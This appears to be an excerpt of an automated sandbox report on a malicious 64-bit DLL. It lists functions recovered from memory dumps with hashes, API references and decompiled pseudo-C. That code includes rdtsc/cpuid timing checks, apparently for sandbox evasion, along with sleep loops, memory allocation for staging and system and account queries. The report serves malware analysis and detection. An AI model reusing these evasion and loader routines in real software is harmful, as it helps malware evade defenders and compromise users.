                                                                                                                                                                                                                                                  • Instruction ID: 4a1e250ffbdc8e7aa8d949f8c064ef6349ee16b8551ea164291e88ac0aa48d5b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F431BA22614B81D2EB19DF22E8087997761EB59F91F488027CE0D87B58EF38CD8EC310
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 002D1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2089142950.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                                  • Instruction ID: d1bac8531cfe92e80bb91a865eafbcd2af6d8508279fefafe86b709fe54f99c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B71C032321B8297EB24CF66E854BA937A1FB48B94F448126DE4E43F14DF38C9A5C700
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 002D22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LookupAccountNameW.ADVAPI32 ref: 002D233C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2089142950.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AccountLookupName
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1484870144-0
                                                                                                                                                                                                                                                  • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                                  • Instruction ID: 33fea62e1e2e04fb18042537ff5bbc87e8d3bb7628b7e994583010893e6b4098
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24319C72711B42CAEB159FB4E84839D33A4EB48B89F584136DA4D97B18EF38C95CC350
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 002D1678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • NtQuerySystemInformation.NTDLL(?,?,00000000,002D2CB1,?,?,00000003,002D24A4), ref: 002D16CB
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2089142950.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InformationQuerySystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3562636166-0
                                                                                                                                                                                                                                                  • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                                  • Instruction ID: b38ee5f1be988edf5b0ffd7ebd9bb38d28544ee51daf91446d95c218023708b5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78218165325B4193FB089F92A808365A2A1BF85BC2F588036DE4A47B24EF3CCD698700
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 002D2434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                                                  			E002D2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E002D11FC(_t73 - 0x29, _t52);
					_t37 = E002D153C(_t73 - 0x29);
					E002D2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E002D1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E002D272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E002D1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E002D2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                                                                  0x002d2434
                                                                                                                                                                                                                                                  0x002d2434
                                                                                                                                                                                                                                                  0x002d2434
                                                                                                                                                                                                                                                  0x002d2434
                                                                                                                                                                                                                                                  0x002d2434
                                                                                                                                                                                                                                                  0x002d2434
                                                                                                                                                                                                                                                  0x002d2434
                                                                                                                                                                                                                                                  0x002d2439
                                                                                                                                                                                                                                                  0x002d243f
                                                                                                                                                                                                                                                  0x002d244d
                                                                                                                                                                                                                                                  0x002d244d
                                                                                                                                                                                                                                                  0x002d244d
                                                                                                                                                                                                                                                  0x002d2512
                                                                                                                                                                                                                                                  0x002d2528
                                                                                                                                                                                                                                                  0x002d2450
                                                                                                                                                                                                                                                  0x002d2454
                                                                                                                                                                                                                                                  0x002d2456
                                                                                                                                                                                                                                                  0x002d245a
                                                                                                                                                                                                                                                  0x002d2460
                                                                                                                                                                                                                                                  0x002d2468
                                                                                                                                                                                                                                                  0x002d246e
                                                                                                                                                                                                                                                  0x002d2472
                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                  0x002d2474
                                                                                                                                                                                                                                                  0x002d2482
                                                                                                                                                                                                                                                  0x002d248c
                                                                                                                                                                                                                                                  0x002d249d
                                                                                                                                                                                                                                                  0x002d249f
                                                                                                                                                                                                                                                  0x002d24a4
                                                                                                                                                                                                                                                  0x002d24a7
                                                                                                                                                                                                                                                  0x002d24b0
                                                                                                                                                                                                                                                  0x002d24bf
                                                                                                                                                                                                                                                  0x002d24c1
                                                                                                                                                                                                                                                  0x002d24cc
                                                                                                                                                                                                                                                  0x002d24d2
                                                                                                                                                                                                                                                  0x002d24d7
                                                                                                                                                                                                                                                  0x002d24db
                                                                                                                                                                                                                                                  0x002d24e0
                                                                                                                                                                                                                                                  0x002d24e2
                                                                                                                                                                                                                                                  0x002d24f0
                                                                                                                                                                                                                                                  0x002d24f0
                                                                                                                                                                                                                                                  0x002d24fc
                                                                                                                                                                                                                                                  0x002d2501
                                                                                                                                                                                                                                                  0x002d2504
                                                                                                                                                                                                                                                  0x002d250d
                                                                                                                                                                                                                                                  0x002d250d
                                                                                                                                                                                                                                                  0x002d2504
                                                                                                                                                                                                                                                  0x002d24cc
                                                                                                                                                                                                                                                  0x002d24bf
                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                  0x002d24a7

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2089142950.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                                  • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                                                  • Instruction ID: 5a9d98ef9cc0f411928368c4d5202ba3aa947ef44ae4795c4a87c6ca5db1a453
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9219D32310A41DAEB24EFB1E4547DD33A1EB98784F884427AE4D57748EE38DD29C750
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2093475198.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093470610.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093480465.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093486254.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093489815.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                                                  • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                                                  • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2093475198.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093470610.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093480465.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093486254.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093489815.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                                                  • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                                                  • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                                                  • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                                                  • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2093475198.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093470610.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093480465.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093486254.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093489815.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                                                  • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 002D10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2089142950.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 354099737-0
                                                                                                                                                                                                                                                  • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                                                  • Instruction ID: 8c8d43cddc9869a584307f342a9d7d4bda62d3360abe955fe6984236d49cf522
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBC01220120680D3E21D7B24EA4C3282224AB00307F10061B820205AA08F780CE88242
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2093475198.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093470610.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093480465.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093486254.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093489815.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                  • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                                  • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 002D260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,002D1E13), ref: 002D264B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2089142950.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1721193555-0
                                                                                                                                                                                                                                                  • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                                  • Instruction ID: 26f4775584a89ecb4f19357efd1425c28f2be3f43fa43f0674643aaf5550fe63
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91E01222724655D3DF15EB20E8583993361FB94705F844127959E426A4EF3CCE5DC740
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 002D1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2089142950.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                                                  • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                                  • Instruction ID: 0aba38490a3a5daa4a3aa28fe8374e819c57f142d00a79be20b1bf8d5643e71b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90D0A772F1024083E734AB10EA1A3992311F3D4316F808207C94944954CF3CC568C600
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2093475198.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093470610.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093480465.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093486254.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093489815.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %
                                                                                                                                                                                                                                                  • API String ID: 0-2567322570
                                                                                                                                                                                                                                                  • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                                  • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2093475198.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093470610.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093480465.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093486254.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2093489815.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                                  • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 002D1E50, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                                                                                                  			E002D1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}















                                                                                                                                                                                                                                                  0x002d1e50
                                                                                                                                                                                                                                                  0x002d1e50
                                                                                                                                                                                                                                                  0x002d1e50
                                                                                                                                                                                                                                                  0x002d1e50
                                                                                                                                                                                                                                                  0x002d1e55
                                                                                                                                                                                                                                                  0x002d1e5a
                                                                                                                                                                                                                                                  0x002d1e5f
                                                                                                                                                                                                                                                  0x002d1e60
                                                                                                                                                                                                                                                  0x002d1e6b
                                                                                                                                                                                                                                                  0x002d1e6b
                                                                                                                                                                                                                                                  0x002d1e71
                                                                                                                                                                                                                                                  0x002d1e73
                                                                                                                                                                                                                                                  0x002d1e84
                                                                                                                                                                                                                                                  0x002d1e86
                                                                                                                                                                                                                                                  0x002d1e8a
                                                                                                                                                                                                                                                  0x002d1e8e
                                                                                                                                                                                                                                                  0x002d1e92
                                                                                                                                                                                                                                                  0x002d1e96
                                                                                                                                                                                                                                                  0x002d1e98
                                                                                                                                                                                                                                                  0x002d1e9f
                                                                                                                                                                                                                                                  0x002d1ea2
                                                                                                                                                                                                                                                  0x002d1ea5
                                                                                                                                                                                                                                                  0x002d1eab
                                                                                                                                                                                                                                                  0x002d1ead
                                                                                                                                                                                                                                                  0x002d1eb8
                                                                                                                                                                                                                                                  0x002d1eba
                                                                                                                                                                                                                                                  0x002d1ec1
                                                                                                                                                                                                                                                  0x002d1ec4
                                                                                                                                                                                                                                                  0x002d1ec7
                                                                                                                                                                                                                                                  0x002d1ec7
                                                                                                                                                                                                                                                  0x002d1ee9

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2089142950.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
